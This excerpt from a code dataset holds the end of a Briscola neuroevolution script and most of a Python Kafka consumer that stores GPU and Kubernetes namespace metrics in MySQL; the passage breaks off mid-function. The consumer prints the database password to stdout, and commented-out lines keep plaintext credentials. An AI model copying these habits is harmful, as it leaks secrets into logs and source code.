NeuralPlayer([carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2),carte.Carta(carte.Seme.BASTONI, 2)])\n g2.mano = game.giocatori[1].mano\n g2.setgenoma(genoma)\n g2.setbriscola(game.briscola)\n\n game.giocatori[0] = g1\n game.giocatori[1] = g2\n game.run()\n return g2.punti()/120\n\n\n\ndef main():\n pop = neat.population.Population('briscola_config')\n gioco.print = lambda _: \"\"\n giocatore.print = lambda _: \"\"\n giocatore.input = lambda _: \"0\"\n pe = parallel.ParallelEvaluator(4, eval_fitness)\n pop.epoch(pe.evaluate, 400)\n\n print(\"Genoma piu' adatto: \")\n winner = pop.most_fit_genomes[-1]\n print(winner)\n\n with open('briscola_giocatore_random', 'wb') as f:\n pickle.dump(winner, f)\nif __name__ == '__main__':\n main()\n","sub_path":"neural_random_briscola.py","file_name":"neural_random_briscola.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"636931337","text":"#!/usr/bin/env python\nimport threading, logging, time\nimport multiprocessing as mp\n\nfrom kafka import KafkaConsumer, TopicPartition\nimport json\n\nimport MySQLdb\nimport os\nimport re\n\nkafka_broker = os.environ['KAFKA_BROKER']\nprint(kafka_broker)\nmysql_db_host = os.environ['MYSQL_DB_HOST']\nprint(mysql_db_host)\nmysql_db_port = os.environ['MYSQL_DB_PORT']\nprint(mysql_db_port)\nmysql_db_user = os.environ['MYSQL_DB_USER']\nprint(mysql_db_user)\nmysql_db_password = os.environ['MYSQL_DB_PASSWORD']\n\n#mysql_db_host = '10.35.64.23'\n#print(mysql_db_host)\n#mysql_db_port = '3306'\n#print(mysql_db_port)\n#mysql_db_user = 'springuser'\n#print(mysql_db_user)\n#mysql_db_password = 'springuser'\nprint(mysql_db_password)\n\n#connection = MySQLdb.connect(\n# host = \"127.0.0.1\",\n# user = \"root\",\n# passwd = \"12345\",\n# db ='computemetrics'\n#)\n#gpu_info = mp.Manager().dict();\ndef conv2G(string):\n print(type(string))\n if type(string) == type(None):\n return(0)\n if type(string) == type(''):\n value = float((re.findall(\"(\\d+(\\.\\d*)?)\", string)[0])[0])\n if string.find('Mi') != -1:\n return (value/1024.0)\n if string.find('m') != -1:\n return (value/1000.0)\n return(value)\n return(float(string))\n\ndef mysql_query(db, query, params):\n cur = db.cursor()\n result = None\n try:\n result = cur.execute(query, params)\n except MySQLdb.Error:\n db.ping(True)\n result = cur.execute(query, params)\n db.commit()\n return(cur)\n\ndef get_gpu_id(db, data):\n select_gpuid = (\n \"SELECT * FROM `gpus` WHERE `uuid` = %(uuid)s;\"\n )\n result = mysql_query(db, select_gpuid, data)\n result = result.fetchone()\n if result != None:\n return(result[0])\n else:\n return(result)\n\ndef get_container_id(db, data):\n select_cgid = (\n \"SELECT * FROM `containergpus` WHERE `gpu_id` = %(gpu_id)s and `nspid` = %(nspid)s ORDER BY `id` DESC;\"\n #\"SELECT * FROM `containergpus` WHERE `nspid` = %(nspid)s;\"\n )\n result = mysql_query(db, select_cgid, data)\n result = result.fetchone()\n if result != None:\n return(result[1])\n else:\n return(result)\n\ndef get_namespace_id(db, data):\n select_cgid = (\n \"SELECT * FROM `containergpus` WHERE `gpu_id` = %(gpu_id)s and `nspid` = %(nspid)s ORDER BY `id` DESC;\"\n #\"SELECT * FROM `containergpus` WHERE `nspid` = %(nspid)s;\"\n )\n result = mysql_query(db, select_cgid, data)\n result = result.fetchone()\n if result != None:\n return(result[5])\n else:\n return(result)\n\n#mysql> SHOW COLUMNS FROM gpus;\n#+----------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+----------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| uuid | varchar(64) | NO | | NULL | |\n#| name | varchar(32) | NO | | NULL | |\n#| enforced.power.limit | int(4) | YES | | NULL | |\n#| memory.total | int(4) | YES | | NULL | |\n#| hostname | varchar(32) | NO | | NULL | |\n#+----------------------+-------------+------+-----+---------+----------------+\ndef insertGpuInfo(db, data, update = False):\n query = ''\n if not update:\n select_gpuuuid = (\n \"SELECT * FROM `gpus` WHERE `uuid` = %(uuid)s;\"\n )\n result = mysql_query(db, select_gpuuuid, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `gpus` (`uuid`, `name`, `enforced_power_limit`, `memory_total`, `hostname`) \"\n \"VALUES (%(uuid)s, %(name)s, %(enforced.power.limit)s, %(memory.total)s, %(hostname)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n return(result.fetchone()[0])\n else:\n #sqlcmd = ''\n #if data.get('user') != None:\n sqlcmd = \"UPDATE `gpus` set `user` = %(user)s where `id` = %(id)s\"\n if data.get('used') != None:\n if data.get('used') == 0:\n data['used'] = None\n sqlcmd = \"UPDATE `gpus` set `used` = %(used)s where `id` = %(id)s\"\n query = (\n sqlcmd\n )\n\n mysql_query(db, query, data)\n return(data['id'])\n\ndef get_gpu_info_db(db, data, type = 0):\n query = ''\n if type == 0: #fetch user\n query = (\n \"SELECT `id`, `user` FROM `gpus` where `user` is not null;\"\n )\n if type == 1: #fetch used\n query = (\n \"SELECT `id`, `used` FROM `gpus` where `used` is not null and `hostname` = %(hostname)s;\"\n )\n\n result = mysql_query(db, query, data)\n t = result.fetchall()\n #print(\"tttttt\", t)\n return dict((x, y) for x, y in t)\n\ndef insertCurrentGpuMetric(db, data):\n print(data)\n select_gpu_metric = (\n \"SELECT * FROM `currentgpumetrics` WHERE `gpu_id` = %(gpu_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_gpu_metric, data)\n\n found = False\n if result != None and result.rowcount != 0:\n found = True\n result = result.fetchone()\n\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `currentgpumetrics` (`gpu_id`, `temperature_gpu`, `utilization_gpu`, `power_draw`, `memory_used`, `query_time`) \"\n \"VALUES (%(gpu_id)s, %(temperature.gpu)s, %(utilization.gpu)s, %(power.draw)s, %(memory.used)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"gpu metric insert : \" + str(data))\n return(result.lastrowid)\n else:\n query = (\n \"UPDATE `currentgpumetrics` SET `query_time` = %(query_time)s, `temperature_gpu` = %(temperature.gpu)s, `utilization_gpu` = %(utilization.gpu)s, `power_draw` = %(power.draw)s, `memory_used` = %(memory.used)s WHERE `id` = %(id)s\"\n )\n data['id'] = result[0]\n mysql_query(db, query, data)\n\n #result = result.fetchone()\n return(result[0])\n\ndef insertGpuMetric(db, data):\n select_gpu_metric = (\n \"SELECT * FROM `gpumetrics` WHERE `gpu_id` = %(gpu_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_gpu_metric, data)\n\n #print(data)\n# found = True\n# if result.rowcount == 0:\n# found = False\n# else:\n# result = result.fetchone()\n #print(result)\n#+----+--------+-------------+------------+----------------------------+-----------------+-----------------+\n#| id | gpu_id | memory_used | power_draw | query_time | temperature_gpu | utilization_gpu |\n#+----+--------+-------------+------------+----------------------------+-----------------+-----------------+\n#| 1 | 1 | 0 | 49 | 2020-03-04T13:36:35.971960 | 31 | 0 |\n\n #(33, 26, 0, 48, '2020-03-04T13:36:41.074563', 29, 0)\n #print(float(result[1]) == float(data['cpu_memory_usage']))\n# if float(result[2]) != float(data['memory.used']):\n# found = False\n# if float(result[3]) != float(data['power.draw']):\n# found = False\n# if float(result[5]) != float(data['temperature.gpu']):\n# found = False\n# if float(result[6]) != float(data['utilization.gpu']):\n# found = False\n #if found == False:\n # print(result)\n\n# if found == False:\n #print(data)\n query = (\n \"INSERT INTO `gpumetrics` (`gpu_id`, `temperature_gpu`, `utilization_gpu`, `power_draw`, `memory_used`, `query_time`) \"\n \"VALUES (%(gpu_id)s, %(temperature.gpu)s, %(utilization.gpu)s, %(power.draw)s, %(memory.used)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"gpu metric insert : \" + str(data))\n return(result.lastrowid)\n# else:\n# query = (\n# \"UPDATE `gpumetrics` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n# )\n# mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n #result = result.fetchone()\n# return(result[0])\n \ndef insertProcessInfo(db, data):\n select_pid = (\n \"SELECT * FROM `processes` WHERE `pid` = %(pid)s and `nspid` = %(nspid)s and `container_id` = %(container_id)s and `start_time` = %(start_time)s;\"\n )\n result = mysql_query(db, select_pid, data)\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `processes` (`pid`, `nspid`, `command`, `full_command`, `container_id`, `start_time`) \"\n \"VALUES (%(pid)s, %(nspid)s, %(command)s, %(full_command)s, %(container_id)s, %(start_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `processes` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n return(result[0])\n\ndef insertProcessMetric(db, data):\n select_process_metric = (\n \"SELECT * FROM `processmetrics` WHERE `process_id` = %(process_id)s and `gpumetric_id` = %(gpumetric_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_process_metric, data)\n\n found = True\n if result.rowcount == 0:\n found = False\n else:\n result = result.fetchone()\n #(2, 543834112, 0.0, 307, 11, 1, '2020-03-04T13:36:35.971960')\n #print(float(result[1]) == float(data['cpu_memory_usage']))\n if float(result[1]) != float(data['cpu_memory_usage']):\n found = False\n if float(result[2]) != float(data['cpu_percent']):\n found = False\n if float(result[3]) != float(data['gpu_memory_usage']):\n found = False\n if result[4] != data['gpumetric_id']:\n found = False\n # if found == False:\n # print(result)\n\n #print(\"Process MetricFound: \" + str(found))\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `processmetrics` (`process_id`, `gpumetric_id`, `gpu_memory_usage`, `cpu_percent`, `cpu_memory_usage`, `query_time`) \"\n \"VALUES (%(process_id)s, %(gpumetric_id)s, %(gpu_memory_usage)s, %(cpu_percent)s, %(cpu_memory_usage)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"process metrics insert : \" + str(data))\n return(result.lastrowid)\n \n query = (\n \"UPDATE `processmetrics` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertNamespaceInfo(db, data):\n# namespace table\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| name | varchar(32) | NO | | NULL | |\n#| owner | varchar(64) | YES | | NULL | |\n#| limits.cpu | int(4) | YES | | NULL | |\n#| limits.memory | varchar(32) | YES | | NULL | |\n#| limits.nvidia.com/gpu | int(4) | YES | | NULL | |\n#| requests.cpu | int(4) | YES | | NULL | |\n#| requests.memory | varchar(32) | YES | | NULL | |\n#| requests.nvidia.com/gpu | int(4) | YES | | NULL | |\n#+-------------------------+-------------+------+-----+---------+----------------+\n select_nsname = (\n \"SELECT * FROM `namespaces` WHERE `name` = %(name)s;\"\n )\n result = mysql_query(db, select_nsname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `namespaces` (`name`, `owner`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`) \"\n \"VALUES (%(name)s, %(owner)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n data['id'] = result[0]\n query = (\n \"UPDATE `namespaces` SET `limits_cpu` = %(limits.cpu)s, `limits_memory` = %(limits.memory)s, `limits_nvidia_com_gpu` = %(limits.nvidia.com/gpu)s, `requests_cpu` = %(requests.cpu)s, `requests_memory` = %(requests.memory)s, `requests_nvidia_com_gpu` = %(requests.nvidia.com/gpu)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, data)\n\n return(result[0])\n\ndef insertNamespaceUsedResourceQuotas(db, data):\n select_data = (\n \"SELECT * FROM `namespaceusedresourcequotas` WHERE `namespace_id` = %(namespace_id)s ORDER BY `id` DESC;\"\n )\n result = mysql_query(db, select_data, data)\n\n found = True\n if result.rowcount == 0:\n found = False\n else:\n result = result.fetchone()\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+#\n#| id | limits_cpu | limits_memory | limits_nvidia_com_gpu | namespace_id | query_time | requests_cpu | requests_memory | requests_nvidia_com_gpu |\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+\n#| 1 | 8 | 8704Mi | NULL | 1 | 03/04/202013:36:28CST | 1020 | 4176Mi | 2 |\n#+----+------------+---------------+-----------------------+--------------+-----------------------+--------------+-----------------+-------------------------+\n #print(result[6] != data['requests.cpu'])\n print(result)\n print(data)\n cut_value = 0.00001\n if found and (conv2G(result[1]) - conv2G(data['limits.cpu'])) > cut_value:\n found = False\n if found and (conv2G(result[2]) - conv2G(data['limits.memory'])) > cut_value:\n found = False\n if found and (conv2G(result[3]) - conv2G(data['limits.nvidia.com/gpu'])) > cut_value:\n found = False\n if found and (conv2G(result[6]) - conv2G(data['requests.cpu'])) > cut_value:\n found = False\n if found and (conv2G(result[7]) - conv2G(data['requests.memory'])) > cut_value:\n found = False\n if found and (conv2G(result[8]) - conv2G(data['requests.nvidia.com/gpu'])) > cut_value:\n found = False\n print('found', found)\n if found == False:\n #print(data)\n query = (\n \"INSERT INTO `namespaceusedresourcequotas` (`namespace_id`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`, `start_time`, `query_time`) \"\n \"VALUES (%(namespace_id)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s, %(query_time)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n #print(\"namespaceusedresourcequota insert : \" + str(data))\n return(result.lastrowid)\n\n query = (\n \"UPDATE `namespaceusedresourcequotas` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertPodInfo(db, data):\n# 'name':'tf-test-0','start_time':'02/24/202002:32:18UTC','phase':'Running','hostname':'gpu01'\n#+--------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+--------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| name | varchar(32) | NO | | NULL | |\n#| start_time | varchar(32) | NO | | NULL | |\n#| namespace_id | int(10) | NO | | NULL | |\n#| hostname | varchar(32) | NO | | NULL | |\n#| phase | varchar(16) | YES | | NULL | |\n#+--------------+-------------+------+-----+---------+----------------+\n# print(data)\n select_podname = (\n \"SELECT * FROM `pods` WHERE `name` = %(name)s and `namespace_id` = %(namespace_id)s and `start_time` = %(start_time)s;\"\n )\n result = mysql_query(db, select_podname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `pods` (`name`, `start_time`, `namespace_id`, `hostname`, `phase`, `query_time`) \"\n \"VALUES (%(name)s, %(start_time)s, %(namespace_id)s, %(hostname)s, %(phase)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n \n result = result.fetchone()\n query = (\n \"UPDATE `pods` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertContainerInfo(db, data):\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+-------------------------+-------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| pod_id | int(10) | NO | | NULL | |\n#| name | varchar(32) | NO | | NULL | |\n#| limits.cpu | varchar(32) | YES | | NULL | |\n#| limits.memory | varchar(32) | YES | | NULL | |\n#| limits.nvidia.com/gpu | varchar(32) | YES | | NULL | |\n#| requests.cpu | varchar(32) | YES | | NULL | |\n#| requests.memory | varchar(32) | YES | | NULL | |\n#| requests.nvidia.com/gpu | varchar(32) | YES | | NULL | |\n#| nspid | bigint(10) | NO | | NULL | |\n#+-------------------------+-------------+------+-----+---------+----------------+\n #print(data)\n select_cname = (\n \"SELECT * FROM `containers` WHERE `name` = %(name)s and `pod_id` = %(pod_id)s;\"\n )\n result = mysql_query(db, select_cname, data)\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `containers` (`pod_id`, `name`, `limits_cpu`, `limits_memory`, `limits_nvidia_com_gpu`, `requests_cpu`, `requests_memory`, `requests_nvidia_com_gpu`, `nspid`, `query_time`) \"\n \"VALUES (%(pod_id)s, %(name)s, %(limits.cpu)s, %(limits.memory)s, %(limits.nvidia.com/gpu)s, %(requests.cpu)s, %(requests.memory)s, %(requests.nvidia.com/gpu)s, %(nspid)s, %(query_time)s);\"\n )\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `containers` SET `query_time` = %(query_time)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'query_time': data['query_time']})\n\n return(result[0])\n\ndef insertContainerGpus(db, data):\n#+--------------+------------+------+-----+---------+----------------+\n#| Field | Type | Null | Key | Default | Extra |\n#+--------------+------------+------+-----+---------+----------------+\n#| id | int(10) | NO | PRI | NULL | auto_increment |\n#| pod_id | int(10) | NO | | NULL | |\n#| container_id | int(10) | NO | | NULL | |\n#| nspid | bigint(10) | NO | | NULL | |\n#| gpu_id | int(10) | NO | | NULL | |\n#+--------------+------------+------+-----+---------+----------------+\n #print(data)\n select_cgname = (\n \"SELECT * FROM `containergpus` WHERE `container_id` = %(container_id)s and `gpu_id` = %(gpu_id)s or `gpu_id` = 0;\"\n )\n result = mysql_query(db, select_cgname, data)\n\n if result.rowcount == 0:\n query = (\n \"INSERT INTO `containergpus` (`pod_id`, `container_id`, `nspid`, `gpu_id`, `namespace_id`) \"\n \"VALUES (%(pod_id)s, %(container_id)s, %(nspid)s, %(gpu_id)s, %(namespace_id)s);\"\n )\n #print(data)\n result = mysql_query(db, query, data)\n return(result.lastrowid)\n\n result = result.fetchone()\n query = (\n \"UPDATE `containergpus` SET `gpu_id` = %(gpu_id)s, `namespace_id` = %(namespace_id)s WHERE `id` = %(id)s\"\n )\n mysql_query(db, query, {'id': result[0], 'gpu_id': data['gpu_id'], 'namespace_id': data['namespace_id']})\n return(result[0])\n\ndef checkifexist(db, table, data):\n #print(data)\n select_querytime = (\n \"SELECT * FROM `\" + table + \"` WHERE `query_time` = %(query_time)s;\"\n )\n result = mysql_query(db, select_querytime, data)\n return(result.rowcount != 0)\n\ndef processGpuMetrics(gpu, connection):\n #gpu = args[0]\n #connection = args[1]\n# connection = MySQLdb.connect(\n# host = mysql_db_host,\n# user = mysql_db_user,\n# passwd = mysql_db_password,\n# db ='computemetrics'\n# )\n\n #print('gpu uuid:', gpu['uuid'])\n gpu_id = 0\n gpumetric_id = 0\n\n try:\n gpu_id = get_gpu_id(connection, {'uuid': gpu['uuid']})\n gpumetric_id = insertGpuMetric(connection, {\n 'gpu_id': gpu_id, \\\n 'temperature.gpu': gpu['temperature.gpu'], \\\n 'utilization.gpu': gpu['utilization.gpu'], \\\n 'power.draw': gpu['power.draw'], \\\n 'memory.used': gpu['memory.used'], \\\n 'query_time': gpu['query_time']\n })\n\n# curr_gpumetric_id = insertCurrentGpuMetric(connection, {\n# 'gpu_id': gpu_id, \\\n# 'temperature.gpu': gpu['temperature.gpu'], \\\n# 'utilization.gpu': gpu['utilization.gpu'], \\\n# 'power.draw': gpu['power.draw'], \\\n# 'memory.used': gpu['memory.used'], \\\n# 'query_time': gpu['query_time']\n# })\n\n except MySQLdb.Error:\n print(MySQLdb.Error)\n\n #print(gpu_id)\n# used = 0\n# if len(gpu['processes']) > 0:\n# used = 1\n# insertGpuInfo(connection, {'id': gpu_id, 'used': used}, True)\n\n# if args[2] == 'gpu_used_status':\n# connection.cursor().close()\n# connection.close()\n# print(\"gpu {} status is {}\".format(gpu_id, used))\n# return\n\t#print(gpumetric_id)\n''' \n for process in gpu['processes']:\n #process = json.loads(process)\n # gpu processes are all started after container created. so it should belong to a container.\n container_id = get_container_id(connection, {\n 'gpu_id': gpu_id, \\\n 'nspid': process['nspid']\n })\n\n if container_id == None:\n break;\n #print(container_id)\n try:\n process_id = insertProcessInfo(connection, {\n\t\t\t 'pid': process['pid'], \\\n\t\t\t 'nspid': process['nspid'], \\\n\t\t\t 'container_id': container_id, \\\n\t\t\t 'command': process['command'], \\\n\t\t\t 'full_command': str(process['full_command']), \\\n\t\t\t 'start_time': process['start_time'],\n\t\t\t 'query_time': gpu['query_time']\n\t\t\t})\n\t #print(process_id)\n metric_id = insertProcessMetric(connection, {\n\t\t\t 'process_id': process_id, \\\n\t\t\t 'gpumetric_id': gpumetric_id, \\\n\t\t\t 'gpu_memory_usage': process['gpu_memory_usage'], \\\n\t\t\t 'cpu_percent': process['cpu_percent'], \\\n\t\t\t 'cpu_memory_usage': str(process['cpu_memory_usage']), \\\n\t\t\t 'query_time': gpu['query_time']\n\t\t\t})\n\n except MySQLdb.Error:\n print(MySQLdb.Error)\n\n connection.cursor().close()\n connection.close()\n'''\nclass Consumer(mp.Process):\n pending_threads = []\n start_threads = []\n threads_count = 0\n def __init__(self, topic, group_id):\n mp.Process.__init__(self)\n self.stop_event = mp.Event()\n self.topic = topic\n self.group_id = group_id\n self.mypartition = TopicPartition(self.topic, 0)\n self.connection = MySQLdb.connect(\n host = mysql_db_host,\n user = mysql_db_user,\n passwd = mysql_db_password,\n db ='computemetrics'\n )\n self.gpu_info_cur = {}\n self.gpu_info_pre = {}\n \n def stop(self):\n self.stop_event.set()\n\n def processMessage(self, message):\n #print(type(message.value))\n if self.topic == 'gpu_metrics':\n if type(message.value) == bytes:\n jsonmsg = json.loads(message.value)\n print(jsonmsg['query_time'])\n #print(type(jsonmsg))\n #if type(jsonmsg) == str:\n # jsonmsg = json.loads(jsonmsg)\n #if checkifexist(self.connection, 'gpumetrics', {'query_time': jsonmsg['query_time']}):\n # return\n\n #threads = []\n for gpu in jsonmsg['gpus']:\n gpu['query_time'] = jsonmsg['query_time']\n gpu['hostname'] = jsonmsg['hostname']\n# print(gpu)\n if self.group_id == 'gpu_used_status':\n gpu_id = get_gpu_id(self.connection, {'uuid': gpu['uuid']})\n\n used = 0\n if len(gpu['processes']) > 0:\n used = 1\n\n insertGpuInfo(self.connection, {'id': gpu_id, 'used': used}, True)\n# print('insert gpu metrics')\n curr_gpumetric_id = insertCurrentGpuMetric(self.connection, {\n 'gpu_id': gpu_id, \\\n 'temperature.gpu': gpu['temperature.gpu'], \\\n 'utilization.gpu': gpu['utilization.gpu'], \\\n 'power.draw': gpu['power.draw'], \\\n 'memory.used': gpu['memory.used'], \\\n 'query_time': gpu['query_time']\n })\n print(\"gpu {} status is {}\".format(gpu_id, used))\n else:\n processGpuMetrics(gpu, self.connection)\n #t = threading.Thread(target=processGpuMetrics, args=(gpu, self.connection, ))\n #t.start()\n\n return ''\n\n if self.topic == 'namespace_metrics':\n #if len(self.gpu_info_pre) == 0:\n self.gpu_info_pre = get_gpu_info_db(self.connection, None, 0)\n\n jsonmsg_all = json.loads(message.value)\n #print(jsonmsg_all)\n#{'query_time':'03/03/202009:59:15CST','owner':'admin@kubeflow.org','namespace':'admin','compute-quota':{'hard':{'limits.cpu':'8','limits.memory':'16Gi','limits.nvidia.com/gpu':'2','requests.cpu':'8','requests.memory':'16Gi','requests.nvidia.com/gpu':'2'},'used':{'limits.cpu':'2','limits.memory':'256Mi','requests.cpu':'510m','requests.memory':'1064Mi','requests.nvidia.com/gpu':'2'}},'pods':[{'name':'tf-test-0','start_time':'02/24/202002:32:18UTC','phase':'Running','hostname':'gpu01','containers':[{'name':'tf-test','resources':{'limits':{'nvidia.com/gpu':'2'},'requests':{'cpu':'500m','memory':'1Gi','nvidia.com/gpu':'2'}},'gpu_uuid':['GPU-ab4510fc-c378-5bf5-615e-3bd8a3e141a2','GPU-ee309bde-fc38-b3ea-b5dc-afc17d0d44e1'],'nspid':4026535186},{'name':'istio-proxy','resources':{'limits':{'cpu':'2','memory':'256Mi'},'requests':{'cpu':'10m','memory':'40Mi'}},'nspid':4026535189}]}]}\n #if checkifexist(self.connection, 'namespaceusedresourcequotas', {'query_time': jsonmsg['query_time']}):\n # return\n #print(jsonmsg)\n for jsonmsg in jsonmsg_all:\n\n if jsonmsg.get('compute-quota') != None:\n if jsonmsg['compute-quota']['hard'].get('limits.cpu') == None:\n jsonmsg['compute-quota']['hard']['limits.cpu'] = None\n if jsonmsg['compute-quota']['hard'].get('limits.memory') == None:\n jsonmsg['compute-quota']['hard']['limits.memory'] = None\n if jsonmsg['compute-quota']['hard'].get('limits.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.cpu') == None:\n jsonmsg['compute-quota']['hard']['requests.cpu'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.memory') == None:\n jsonmsg['compute-quota']['hard']['requests.memory'] = None\n if jsonmsg['compute-quota']['hard'].get('requests.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] = None\n else:\n jsonmsg['compute-quota'] = {}\n jsonmsg['compute-quota']['hard'] = {}\n jsonmsg['compute-quota']['hard']['limits.cpu'] = None\n jsonmsg['compute-quota']['hard']['limits.memory'] = None\n jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'] = None\n jsonmsg['compute-quota']['hard']['requests.cpu'] = None\n jsonmsg['compute-quota']['hard']['requests.memory'] = None\n jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] = None\n\n namespace_id = insertNamespaceInfo(self.connection, {\n 'name': jsonmsg['namespace'], \\\n 'owner': jsonmsg['owner'], \\\n 'limits.cpu': jsonmsg['compute-quota']['hard']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['hard']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['hard']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['hard']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['hard']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['hard']['requests.nvidia.com/gpu'] \\\n })\n\n\n needGetFromContainer = False\n if jsonmsg.get('compute-quota') != None and False:\n if jsonmsg['compute-quota'].get('used') != None:\n if jsonmsg['compute-quota']['used'].get('limits.cpu') == None:\n jsonmsg['compute-quota']['used']['limits.cpu'] = None\n if jsonmsg['compute-quota']['used'].get('limits.memory') == None:\n jsonmsg['compute-quota']['used']['limits.memory'] = None\n if jsonmsg['compute-quota']['used'].get('limits.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] = None\n if jsonmsg['compute-quota']['used'].get('requests.cpu') == None:\n jsonmsg['compute-quota']['used']['requests.cpu'] = None\n if jsonmsg['compute-quota']['used'].get('requests.memory') == None:\n jsonmsg['compute-quota']['used']['requests.memory'] = None\n if jsonmsg['compute-quota']['used'].get('requests.nvidia.com/gpu') == None:\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] = None\n namespaceusedrq_id = insertNamespaceUsedResourceQuotas(self.connection, {\n 'namespace_id': namespace_id, \\\n 'limits.cpu': jsonmsg['compute-quota']['used']['limits.cpu'], \\\n 'limits.memory': jsonmsg['compute-quota']['used']['limits.memory'], \\\n 'limits.nvidia.com/gpu': jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'], \\\n 'requests.cpu': jsonmsg['compute-quota']['used']['requests.cpu'], \\\n 'requests.memory': jsonmsg['compute-quota']['used']['requests.memory'], \\\n 'requests.nvidia.com/gpu': jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'], \\\n 'query_time': jsonmsg['query_time']\n })\n else:\n needGetFromContainer = True\n jsonmsg['compute-quota']['used'] = {}\n jsonmsg['compute-quota']['used']['limits.cpu'] = 0\n jsonmsg['compute-quota']['used']['limits.memory'] = 0\n jsonmsg['compute-quota']['used']['limits.nvidia.com/gpu'] = 0\n jsonmsg['compute-quota']['used']['requests.cpu'] = 0\n jsonmsg['compute-quota']['used']['requests.memory'] = 0\n jsonmsg['compute-quota']['used']['requests.nvidia.com/gpu'] = 0\n\n if jsonmsg.get('pods') != None:\n for pod in jsonmsg['pods']:\n pod_id = insertPodInfo(self.connection, {\n 'name': pod['name'], \\\n 'start_time': pod['start_time'], \\\n 'namespace_id': namespace_id, \\\n 'hostname': pod['hostname'], \\\n 'phase': pod['phase'], \\\n 'query_time': jsonmsg['query_time']\n })\n\n for container in pod['containers']:\n if container['resources'].get('limits') != None:\n if container['resources']['limits'].get('cpu') == None:\n container['resources']['limits']['cpu'] = 0\n if container['resources']['limits'].get('memory') == None:\n container['resources']['limits']['memory'] = 0\n if container['resources']['limits'].get('nvidia.com/gpu') == None:\n container['resources']['limits']['nvidia.com/gpu'] = 0\n else:\n container['resources']['limits'] = {'cpu': 0, 'memory': 0, 'nvidia.com/gpu': 0}\n #continue\n #container['resources']['limits']['cpu'] = None\n 